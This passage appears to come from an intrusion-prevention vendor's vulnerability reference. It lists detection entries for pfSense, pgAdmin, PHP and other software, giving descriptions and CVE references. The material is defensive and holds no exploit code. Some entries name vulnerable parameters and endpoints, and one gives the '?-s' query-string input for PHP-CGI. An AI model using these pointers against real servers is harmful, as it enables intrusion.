Generic_CS-Persistent-Systems-Radia-Client-Automation-Command-Execution

References:

CVE-2015-1497
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1497

BID-72612
http://www.securityfocus.com/bid/72612

OSVDB-118382
http://www.osvdb.org/118382

Persits-Xupload-ActiveX-Buffer-Overflow

About this vulnerability:

A Persits Xupload ActiveX Buffer Overflow vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-732-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Persits XUpload

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Persits XUpload, versions 3.0.0.4 and before, which allows remote attackers to execute arbitrary code via a long argument to the AddFile method.

Situation:

File-Text_Persits-Xupload-ActiveX-Buffer-Overflow

References:

CVE-2008-0492
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0492

BID-27456
http://www.securityfocus.com/bid/27456

OSVDB-40762
http://www.osvdb.org/40762

PetitPotam-NTLM-Relay-Attack

About this vulnerability:

An attempt to execute the PetitPotam NTLM relay attack detected

Risk:

High

First detected in:

sgpkg-ips-1375-5242

Last changed:

sgpkg-ips-1823-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

An attempt to execute the PetitPotam NTLM relay attack detected.

Situation:

SMB-TCP_PetitPotam-NTLM-Relay-Attack

References:

CVE-2021-36942
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36942

Pfsense-Authenticated-Group-Member-Remote-Command-Execution

About this vulnerability:	A Pfsense Authenticated Group Member Remote Command Execution vulnerability
Risk:	High
First detected in:	sgpkg-ips-1035-5242
Last changed:	sgpkg-ips-1818-5242
Platform:	FreeBSD
Software:	PfSense
Type:	Input Validation
Description:	A vulnerability in PfSense, version 2.3.1_1 and before, which allows remote attackers to execute arbitrary commands via the system_groupmanager.php page.
Situation:	HTTP_CRL-Pfsense-Post-Auth-Group-Member-Command-Execution

Pfsense-Post-Auth-Group-Member-Command-Execution

About this vulnerability:	A vulnerability in pfSense firewall
Risk:	Moderate
First detected in:	sgpkg-ips-1029-5242
Last changed:	sgpkg-ips-1818-5242
Platform:	Generic
Software:	PfSense
Type:	Input Validation
Description:	A command injection vulnerability has been reported in pfSense. This vulnerability is due to system_groupmanager.php incorrectly validating the members HTTP parameter. A remote, authenticated attacker can exploit this vulnerability by sending crafted requests to the system_groupmanager.php URI. Successful exploitation will result in arbitrary command execution with root privileges.
Situation:	HTTP_CRL-Pfsense-Post-Auth-Group-Member-Command-Execution

Pfsense-Webconfigurator-Firewall_Aliases_Edit.php-Input-Validation-Error

About this vulnerability:	A vulnerability in Electric Sheep Fencing pfSense
Risk:	Moderate
First detected in:	sgpkg-ips-567-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	FreeBSD
Software:	PfSense
Type:	Input Validation
Description:	An input validation error vulnerability exists in Electric Sheep Fencing pfSense firewall. The vulnerability is due to insufficient validation of user supplied input when processing the addressN parameter in firewall_aliases_edit.php. A remote authenticated attacker could exploit this vulnerability by sending a malicious request using the vulnerable parameter to the firewall. Successful exploitation could lead to remote code execution under the security context of the root user.
Situation:	HTTP_CRL-Pfsense-Webconfigurator-Firewall_Aliases_Edit-Input-Validation-Error

Pfsense-Webgui-Zone-Parameter-Cross-Site-Scripting

About this vulnerability:

A vulnerability in pfSense Project pfSense

Risk:

High

First detected in:

sgpkg-ips-665-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PfSense

Type:

Input Validation

Description:

A cross-site scripting vulnerability has been reported in pfSense. The vulnerability is due to services_captiveportal_zones.php not validating the zone parameter when the act parameter is set to del. A remote attacker can exploit this vulnerability by enticing a user to open a specially crafted link. Successful exploitation will result in the attacker-controlled script code being executed in the target user's browser in the context of the affected site.

Situation:

HTTP_CRL-Pfsense-Webgui-Zone-Parameter-Cross-Site-Scripting

References:

CVE-2015-4029
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4029

Pgadmin-Authenticated-Remote-Code-Execution-CVE-2023-5002

About this vulnerability:

An attempt to exploit a vulnerability in pgAdmin detected

Risk:

High

First detected in:

sgpkg-ips-1837-5242

Last changed:

sgpkg-ips-1837-5242

Platform:

Generic

Software:

pgAdmin

Type:

Input Validation

Description:

A flaw was found in pgAdmin, which occurs when the pgAdmin server validates the path a user selects to external PostgreSQL utilities such as "pg_dump" and "pg_restore". Versions of pgAdmin prior to 7.6 failed to properly control the server code executed on this API, allowing an authenticated user to run arbitrary commands on the server.

Situation:

HTTP_CRL-Pgadmin-Authenticated-Remote-Code-Execution-CVE-2023-5002

References:

CVE-2023-5002
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5002

Pgadmin-Binary-Path-API-RCE

About this vulnerability:

An attempt to exploit a vulnerability in pgAdmin detected

Risk:

High

First detected in:

sgpkg-ips-1774-5242

Last changed:

sgpkg-ips-1774-5242

Platform:

Linux; Windows

Software:

pgAdmin

Type:

Input Validation

Description:

A vulnerability in pgAdmin, versions 8.4 and before, which allows remote attackers to upload and execute arbitrary files due to the lack of validation input paths to the validate_binary_path endpoint.

Situation:

HTTP_CRL-Pgadmin-Binary-Path-API-RCE

References:

CVE-2024-3116
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-3116

Pgadmin-Import-Servers-Directory-Traversal-CVE-2023-0241

About this vulnerability:

A vulnerability in pgAdmin

Risk:

High

First detected in:

sgpkg-ips-1583-5242

Last changed:

sgpkg-ips-1583-5242

Platform:

Generic

Software:

pgAdmin

Type:

Directory Traversal

Description:

A directory traversal vulnerability exists in pgAdmin. The vulnerability is due to insufficient input validation of the filenames. A remote attacker can exploit this vulnerability by sending a crafted request to the vulnerable server. Successful exploitation would result in sensitive information disclosure or policy bypass.

Situation:

HTTP_CRL-Pgadmin-Import-Servers-Directory-Traversal-CVE-2023-0241

References:

CVE-2023-0241
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0241

Pgadmin-Pga4_session-Directory-Traversal

About this vulnerability:

A vulnerability in pgAdmin

Risk:

High

First detected in:

sgpkg-ips-1706-5242

Last changed:

sgpkg-ips-1706-5242

Platform:

Generic

Software:

pgAdmin

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported in pgAdmin. The vulnerability is due to improper validation of the pga4_session cookie when it is used in a file path. Successful exploitation could result in an attacker deserializing an arbitrary file on the target server, possibly leading to arbitrary code execution under the security context of the pgAdmin service.

Situation:

HTTP_CSH-Pgadmin-Pga4_session-Directory-Traversal

References:

CVE-2024-2044
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2044

Pgadmin-Query-Tool-Authenticated-RCE-CVE-2025-2945

About this vulnerability:

A vulnerability in pgAdmin

Risk:

High

First detected in:

sgpkg-ips-1867-5242

Last changed:

sgpkg-ips-1867-5242

Platform:

Generic

Software:

pgAdmin

Type:

Input Validation

Description:

An vulnerability in pgAdmin, versions before 9.2, which allows authenticated remote attackers to execute arbitrary Python code throught the query_commited and high_availability parameters, due to insufficient validation before being passed to Python eval().

Situation:

HTTP_CRL-Pgadmin-Query-Tool-Authenticated-RCE-CVE-2025-2945

References:

CVE-2025-2945
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-2945

Pgadmin-Validate_Binary_Path-CVE-2024-3116-Remote-Code-Execution

About this vulnerability:

A vulnerability in pgAdmin

Risk:

High

First detected in:

sgpkg-ips-1721-5242

Last changed:

sgpkg-ips-1721-5242

Platform:

Generic

Software:

pgAdmin

Type:

Input Validation

Description:

A remote code execution vulnerability has been reported in pgAdmin. The vulnerability is due to improper validation of a file path used in the validate_binary_path endpoint. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary code execution under the security context of the pgAdmin service.

Situation:

HTTP_CRL-Pgadmin-Validate_Binary_Path-CVE-2024-3116-Remote-Code-Execution

References:

CVE-2024-3116
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-3116

Pgadmin-Validate_Binary_Path-Remote-Code-Execution

About this vulnerability:

A vulnerability in pgAdmin pgAdmin

Risk:

Moderate

First detected in:

sgpkg-ips-1544-5242

Last changed:

sgpkg-ips-1544-5242

Platform:

Generic

Software:

pgAdmin

Type:

Input Validation

Description:

Insufficient validation of the utility_path parameter sent to the validate_binary_path endpoint causes a remote code execution vulnerability in pgAdmin. A successful exploit allows an attacker to execute arbitrary code on the target with the privileges of the affected program.

Situation:

HTTP_CRL-Pgadmin-Validate_Binary_Path-Remote-Code-Execution

References:

CVE-2022-4223
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4223

PGP-Key-File

About this vulnerability:	A PGP key file was detected
Risk:	Moderate
First detected in:	sgpkg-ips-489-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	PGP
Type:	Insecure Configuration
Description:	A PGP key file was detected
Situation:	File-Text_PGP-Private-Key-File File-Text_PGP-Public-Key-File

Phamm-Helpers.php-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Phamm Phamm

Risk:

Moderate

First detected in:

sgpkg-ips-970-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Phamm

Type:

Input Validation

Description:

Lack of request validation causes a cross-site scripting vulnerability in Phamm. A successful attack allows an attacker to execute arbitrary script in the browser of a target user.

Situation:

HTTP_CRL-Phamm-Helpers.php-Cross-Site-Scripting

References:

CVE-2017-0378
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0378

BID-99927
http://www.securityfocus.com/bid/99927

Phatbot-Trojan

About this vulnerability:	Phatbot Trojan
Risk:	High
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Phatbot is a Windows trojan.
Situation:	Generic_SS-Phatbot-Trojan-Infection FTP_SS-Phatbot-Trojan-Infection

Phishing-Related-URL

About this vulnerability:	A URL related to phishing sites.
Risk:	High
First detected in:	sgpkg-ips-1258-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Malfunction
Description:	The accessed URL looks like a phishing site.
Situation:	HTTP_CSH-Phishing-URL-Accessed

Phishing-Script_Detected

About this vulnerability:	A phishing template was detected.
Risk:	High
First detected in:	sgpkg-ips-1378-5242
Last changed:	sgpkg-ips-1423-5242
Platform:	Generic
Software:	<os>
Type:	Malfunction
Description:	A phishing template for stealing user credentials or other sensitive information was detected.
Situation:	File-Text_Phishing-Script_Detected File-Text_Phishing-Script_Detected_2

Phishing-Template-Detected

About this vulnerability:	A phishing template was detected.
Risk:	High
First detected in:	sgpkg-ips-1253-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Malfunction
Description:	A phishing template for stealing user credentials or other sensitive information was detected.
Situation:	File-Text_Phishing-Template-Detected-1 File-Text_Phishing-Template-Detected-4 File-Text_Phishing-Template-Detected-3 File-Text_Phishing-Template-Detected-2 File-Text_Phishing-Template-Detected-5

Phoenix-Contact-Automationworx-Plcopen-Xml-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Phoenix Contact Automationworx

Risk:

Moderate

First detected in:

sgpkg-ips-1270-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Phoenix Contact Automationworx

Type:

Buffer Overflow

Description:

There exists a stack buffer overflow in the Phoenix Contact Automationworx Suite. Successful exploitation could lead in arbitrary code execution.

Situation:

File-Text_Phoenix-Contact-Automationworx-Plcopen-Xml-Stack-Buffer-Overflow

References:

CVE-2020-12497
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12497

Phorum-SQL-read.php3

About this vulnerability:

A vulnerability in Phorum 3.0.7

Risk:

Moderate

First detected in:

sgpkg-ips-631-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Phorum

Type:

SQL Injection

Description:

There exists an SQL injection vulnerability in Phorum 3.0.7.

Situation:

HTTP_CRL-Phorum-SQL-read.php3-Attack

References:

CVE-2000-1233
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1233

OSVDB-118161
http://www.osvdb.org/118161

PHP-4-Unserialize-ZVAL-Reference-Counter-Overflow

About this vulnerability:

A PHP 4 Unserialize ZVAL Reference Counter Overflow vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-758-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

PHP

Type:

Integer Overflow

Description:

An integer overflow vulnerability in PHP, versions 4.4.4 and earlier, which allows remote attackers to execute arbitrary code via a long string to the unserialize function, which triggers an overflow in the ZVAL reference counter.

Situation:

HTTP_CSH-PHP-4-Unserialize-ZVAL-Reference-Counter-Overflow

References:

CVE-2007-1286
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1286

OSVDB-32771
http://www.osvdb.org/32771

Php-Addslashes-Null-Character-Parsing-Error

About this vulnerability:

A directory traversal vulnerability in PHP

Risk:

Moderate

First detected in:

sgpkg-ips-617-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP

Type:

Directory Traversal

Description:

Old PHP versions do not parse encoded null characters properly, which may allow an attacker to view arbitrary files.

Situation:

HTTP_SHS-PHP-apache_request_headers-Function-Buffer-Overflow

References:

CVE-2004-1020
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1020

BID-11981
http://www.securityfocus.com/bid/11981

PHP-apache_request_headers-Function-Buffer-Overflow

About this vulnerability:

An attempt to exploit a vulnerability in the PHP apache_request_headers function detected

Risk:

High

First detected in:

sgpkg-ips-656-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

PHP

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in the PHP apache_request_headers function, in sapi/cgi/cgi_main.c, versions 5.4.x before 5.4.3, which allows remote attackers to execute arbitrary code or cause a denial of service condition via a long string in an HTTP request header.

Situation:

References:

CVE-2012-2329
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2329

BID-53455
http://www.securityfocus.com/bid/53455

OSVDB-82215
http://www.osvdb.org/82215

Php-Arbitrary-Location-File-Upload

About this vulnerability:

Php allows arbitrary file upload

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP

Type:

Malfunction

Description:

PHP is vulnerable to an arbitrary location file upload vulnerability. This issue is due to a failure of the PHP application to properly sanitize user-supplied file name input which could lead to overwrite $_FILES array elements. An attacker may exploit this issue to upload files to an arbitrary location on a computer running the affected software. This may facilitate arbitrary server-side script code execution as well as other attacks.

Situation:

HTTP_CS-Php-Arbitrary-Location-File-Upload

References:

CVE-2004-0959
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0959

BID-11190
http://www.securityfocus.com/bid/11190

Php-cfgProgDir-Parameter-File-Inclusion

About this vulnerability:	PHP script may allow arbitrary file execution
Risk:	High
First detected in:	sgpkg-ips-147-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	PHP
Type:	Insecure Configuration
Description:	PHP is a scripting language used in web servers. Some server scripts may allow downloading arbitrary files for execution using the cfgProgDir parameter.
Situation:	HTTP_CRL-Php-cfgProgDir-Parameter-File-Inclusion

Php-Cgi-Query-String-Information-Disclosure

About this vulnerability:

An information disclosure vulnerability in PHP

Risk:

High

First detected in:

sgpkg-ips-452-4333

Last changed:

sgpkg-ips-1639-5242

Platform:

Generic

Software:

PHP

Type:

Input Validation

Description:

PHP is a scripting language used in web servers. A security vulnerability has been identified in PHP. The vulnerability is due to the way in which query strings that omit an equals sign '=' are handled. A remote, unauthenticated attacker can exploit this vulnerability by appending a query string of the form "?-s" to a URL.

Situation:

HTTP_CSU-Php-Cgi-Query-String-Information-Disclosure
HTTP_CSU_PHP-Cgi-Remote-Code-Execution

References:

CVE-2012-1823
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823

PHP-Cgi-Remote-Code-Execution

About this vulnerability:

A PHP Cgi Remote Code Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-712-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP

Type:

Input Validation

Description:

A vulnerability in PHP, versions before 5.3.12 and 5.4.x before 5.4.2, in sapi/cgi/cgi_main.c, when configured as a CGI script, does not properly handle query strings that are missing an equals sign, which allows remote attackers to execute arbitrary code.

Situation:

HTTP_CSU_PHP-Cgi-Remote-Code-Execution

References:

CVE-2012-1823
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823

OSVDB-81633
http://www.osvdb.org/81633

Php-Cgi-Remote-Code-Execution-CVE-2024-4577

About this vulnerability:

A vulnerability in PHP

Risk:

Critical

First detected in:

sgpkg-ips-1735-5242

Last changed:

sgpkg-ips-1735-5242

Platform:

Windows

Software:

PHP

Type:

Input Validation

Description:

A remote code execution vulnerability has been reported in PHP versions 8.1.x before 8.1.29, 8.2.x before 8.2.20, and 8.3.x before 8.3.8. This vulnerability affects systems that use Apache and PHP-CGI on Windows.

Situation:

HTTP_CSU-Php-Cgi-Remote-Code-Execution-CVE-2024-4577

References:

CVE-2024-4577
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4577

Php-Chart-Wizards-Url-Remote-Code-Execution

About this vulnerability:

A remote code execution vulnerability in php-Chart API

Risk:

Moderate

First detected in:

sgpkg-ips-537-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Generic HTTP server

Type:

Insecure Configuration

Description:

A vulnerability exists in php-Chart 1.0 API allowing an attacker to execute arbitrary php code.

Situation:

HTTP_CSU-Php-Chart-Wizards-Url-Remote-Code-Execution

References:

OSVDB-89334
http://www.osvdb.org/89334

Php-Core-Unserialize-Function-Integer-Overflow

About this vulnerability:

A vulnerability in PHP Group PHP

Risk:

Moderate

First detected in:

sgpkg-ips-618-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP

Type:

Integer Overflow

Description:

A code execution vulnerability has been reported in PHP core. The vulnerability is due to an integer overflow within the unserialize() function. A remote attacker can exploit the vulnerability by sending crafted serialize data to a web application running a vulnerable version of PHP. A successful attack will crash the application, and possibly remote code execution.

Situation:

HTTP_CS-Php-Core-Unserialize-Function-Integer-Overflow

References:

CVE-2014-3669
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3669

OSVDB-113423
http://www.osvdb.org/113423

Php-Core-Unserialize-Key-Name-Use-After-Free

About this vulnerability:

A vulnerability in PHP

Risk:

High

First detected in:

sgpkg-ips-627-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP

Type:

Malfunction

Description:

A code execution vulnerability has been reported in PHP core. The vulnerability is due to a use after free error when handling serialized objects with identical number key names within the unserialize() function. A remote attacker can exploit the vulnerability by sending crafted serialized data to a web application running a vulnerable version of PHP. A successful attack will result in remote code execution under the context of the service running the PHP service.

Situation:

HTTP_CRL-Php-Core-Unserialize-Key-Name-Use-After-Free

References:

CVE-2015-0231
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0231

OSVDB-116020
http://www.osvdb.org/116020

Php-Core-Unserialize-Process-Nested-Data-Use-After-Free

About this vulnerability:

A vulnerability in PHP Group PHP

Risk:

High

First detected in:

sgpkg-ips-628-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP

Type:

Malfunction

Description:

A code execution vulnerability has been reported in PHP core. The vulnerability is due to a use after free error when handling serialized objects with identical keys within the unserialize() function. A remote attacker can exploit the vulnerability by sending crafted serialized data to a web application running a vulnerable version of PHP. A successful attack will result in remote code execution under the context of the service running the PHP service.

Situation:

HTTP_CRL-Php-Core-Unserialize-Key-Name-Use-After-Free

References:

CVE-2014-8142
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8142

OSVDB-116020
http://www.osvdb.org/116020

Php-Dateinterval-Heap-Buffer-Overread-Denial-Of-Service

About this vulnerability:

A vulnerability in PHP Group PHP

Risk:

High

First detected in:

sgpkg-ips-561-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP

Type:

Buffer Overflow

Description:

A denial of service vulnerability has been reported in PHP. The vulnerability is due to a buffer overread when creating a dateInterval object. A remote attacker can exploit this flaw by sending a malicious request. Successful exploitation could result in a denial of service condition.

Situation:

HTTP_CRL-Php-Dateinterval-Heap-Buffer-Overread-Denial-Of-Service

References:

CVE-2013-6712
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6712

BID-64018
http://www.securityfocus.com/bid/64018

OSVDB-100440
http://www.osvdb.org/100440

Php-Datetimezone-Object-Timezone-Unserialize-Type-Confusion

About this vulnerability:	A vulnerability in PHP
Risk:	High
First detected in:	sgpkg-ips-632-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	PHP
Type:	Malfunction
Description:	A code execution vulnerability has been reported in PHP. The vulnerability is due to a type confusion error when handling serialized DateTimeZone objects within the unserialize() function. A remote attacker can exploit the vulnerability by sending crafted serialized data to a web application running a vulnerable version of PHP. A successful attack will result in remote code execution under the context of the service running PHP.
Situation:	HTTP_CRL-Php-Datetimezone-Object-Timezone-Unserialize-Type-Confusion

Php-DNS_Get_Record-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in PHP

Risk:

High

First detected in:

sgpkg-ips-1142-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP

Type:

Malfunction

Description:

An out-of-bounds read vulnerability has been reported in PHP. The vulnerability is due to improper handling of malformed DNS responses. A remote attacker could exploit this vulnerability by sending a crafted DNS response to a vulnerable server. Successful exploitation could lead to information disclosure or crash of the PHP application.

Situation:

DNS-TCP_Php-DNS_Get_Record-Out-Of-Bounds-Read
DNS-UDP_Php-DNS_Get_Record-Out-Of-Bounds-Read

References:

CVE-2019-9022
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9022

PHP-Exception-Tostring-Denial-Of-Service

About this vulnerability:

A vulnerability in PHP Group PHP

Risk:

Moderate

First detected in:

sgpkg-ips-846-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP

Type:

Infinite Loop

Description:

A denial of service condition caused by improper deserialization on PHP can be triggered by a crafted serialized object that refers to itself in the __toString method.

Situation:

File-Text_PHP-Exception-Tostring-Denial-Of-Service

References:

CVE-2016-7478
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7478

BID-95150
http://www.securityfocus.com/bid/95150

Php-EXIF-Extension-EXIF_Read_Data-Null-Pointer-Dereference

About this vulnerability:

A vulnerability in PHP Group PHP

Risk:

Moderate

First detected in:

sgpkg-ips-628-5211

Last changed:

sgpkg-ips-1732-5242

Platform:

Generic

Software:

PHP

Type:

Malfunction

Description:

A code execution vulnerability exists in PHP's exif extension. The vulnerability is due to a NULL Pointer dereference inside the exif_read_data function. A remote attacker can exploit this vulnerability by sending crafted picture data to a web application running a vulnerable version of PHP. A successful attack will crash the application, and possibly result in remote code execution.

Situation:

File-JPEG_Php-EXIF-Extension-EXIF_Read_Data-Null-Pointer-Dereference

References:

CVE-2015-0232
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0232

OSVDB-117467
http://www.osvdb.org/117467

Php-EXIF-Extension-IFD_Make_Value-Thumbnail-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in PHP Group PHP

Risk:

Moderate

First detected in:

sgpkg-ips-619-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP

Type:

Buffer Overflow

Description:

A code execution vulnerability exists in PHP exif extension. The vulnerability is due to a buffer overflow when handles exif thumbnail. A remote attacker can exploit the vulnerability by sending crafted picture data to a web application running a vulnerable version of PHP. A successful attack will crash the application, and possibly result in remote code execution.

Situation:

HTTP_CS-Php-EXIF-Extension-IFD_Make_Value-Thumbnail-Heap-Buffer-Overflow
File-Binary_Php-EXIF-Extension-IFD_Make_Value-Thumbnail-Heap-Buffer-Overflow

References:

CVE-2014-3670
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3670

BID-70665
http://www.securityfocus.com/bid/70665

OSVDB-113421
http://www.osvdb.org/113421

Php-EXIF-Header-Parsing-Integer-Overflow

About this vulnerability:

A vulnerability in PHP Group PHP

Risk:

High

First detected in:

sgpkg-ips-503-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP

Type:

Integer Overflow

Description:

An integer overflow vulnerability has been reported in PHP. The vulnerability is due to a lack of validation on EXIF data read from a file. A remote attacker could exploit this vulnerability in web applications using this functionality. A successful attack could result in information disclosure or a denial-of-service condition.

Situation:

HTTP_CS-Php-EXIF-Header-Parsing-Integer-Overflow

References:

CVE-2011-4566
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4566

BID-50907
http://www.securityfocus.com/bid/50907

OSVDB-77446
http://www.osvdb.org/77446

PHP-EXIF_Process_User_Comment-Null-Pointer-Dereference

About this vulnerability:

A vulnerability in PHP Group PHP

Risk:

Moderate

First detected in:

sgpkg-ips-786-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP

Type:

Malfunction

Description:

A null pointer dereference in the Exif module of PHP results in a vulnerability, which can be exploited to cause a denial of service condition.

Situation:

File-JPEG_PHP-EXIF_Process_User_Comment-Null-Pointer-Dereference

References:

CVE-2016-6292
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6292

Php-Fileinfo-Call-Stack-Exhaustion-Denial-Of-Service

About this vulnerability:

A vulnerability in PHP Group PHP

Risk:

High

First detected in:

sgpkg-ips-570-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP

Type:

Resource Starvation

Description:

A denial of service vulnerability has been reported in PHP Fileinfo. The vulnerability is due to call stack exhaustion when mget handles a magic string. A remote attacker can exploit this flaw by sending a malicious request. Successful exploitation could result in a denial of service condition.

Situation:

HTTP_CS-Php-Fileinfo-Call-Stack-Exhaustion-Denial-Of-Service

References:

CVE-2014-1943
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1943

OSVDB-103424
http://www.osvdb.org/103424

Php-Fileinfo-CDF_Read_Property_Info-Denial-Of-Service

About this vulnerability:

A vulnerability in PHP Group PHP

Risk:

Moderate

First detected in:

sgpkg-ips-613-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP

Type:

Integer Overflow

Description:

A denial of service vulnerability exists in PHP. It is due to an integer overflow error in the FileInfo module while processing CDF files. This vulnerability exists because of an incomplete fix for CVE-2012-1571 A remote attacker can exploit the vulnerability by sending crafted CDF files to a web application running a vulnerable version of PHP. A successful attack will crash the application, which can cause a denial of service condition.

Situation:

HTTP_CS-Php-Fileinfo-CDF_Read_Property_Info-Denial-Of-Service

References:

CVE-2014-3587
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3587

BID-69325
http://www.securityfocus.com/bid/69325

OSVDB-79681
http://www.osvdb.org/79681

PHP-FPM-Init_request_info-Path_Info-Buffer-Underflow

About this vulnerability:

A vulnerability in PHP

Risk:

Moderate

First detected in:

sgpkg-ips-1202-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP

Type:

Buffer Overflow

Description:

There exists a pre-auth remote code execution vulnerability in the PHP FPM. Successful exploitation could lead in arbitrary code execution.

Situation:

HTTP_CSU-PHP-FPM-Init_request_info-Path_Info-Buffer-Underflow

References:

CVE-2019-11043
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11043

Php-FTP_genlist-Method-Integer-Overflow

About this vulnerability:

A vulnerability in PHP Group PHP

Risk:

High

First detected in:

sgpkg-ips-654-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP

Type:

Integer Overflow

Description:

A code execution vulnerability exists in PHP's ftp_genlist() method. The vulnerability is due to lack of integer overflow detection when calculating the size of the response to the FTP LIST command. A remote attacker can exploit the vulnerability by hosting an FTP server and sending crafted data to a web application running a vulnerable version of PHP. Successful exploitation could lead to arbitrary code execution under the security context of the web application.

Situation:

FTP_DI-Php-FTP_genlist-Method-Integer-Overflow

References:

CVE-2015-4022
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4022

OSVDB-122126
http://www.osvdb.org/122126

PHP-Fusion-Administration-Banner-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in PHP-Fusion.

Risk:

Moderate

First detected in:

sgpkg-ips-1263-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP-Fusion

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability exist in PHP-Fusion Banner feature. The vulnerability is due to improper validation of user input in HTTP requests. A remote authenticated attacker can exploit the vulnerability by sending a crafted request to the vulnerable server. Successful exploitation could result in arbitrary script code execution in the target user's browser.

Situation:

HTTP_CS-PHP-Fusion-Administration-Banner-Stored-Cross-Site-Scripting

References:

CVE-2020-12438
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12438

PHP-Fusion-Downloads.php-Command-Injection

About this vulnerability:

A vulnerability in PHP-Fusion

Risk:

High

First detected in:

sgpkg-ips-1298-5242

Last changed:

sgpkg-ips-1298-5242

Platform:

Generic

Software:

PHP-Fusion

Type:

Input Validation

Description:

A command injection vulnerability has been reported in PHP-Fusion. The vulnerability is due to insufficient validation of HTTP request parameters in downloads.php. A remote unauthenticated attacker could exploit this vulnerability by sending an crafted HTTP request to the vulnerable server. Successful exploitation of this vulnerability could allow the attacker to execute command in the security context of the running server.

Situation:

HTTP_CRL-PHP-Fusion-Downloads.php-Command-Injection

References:

CVE-2020-24949
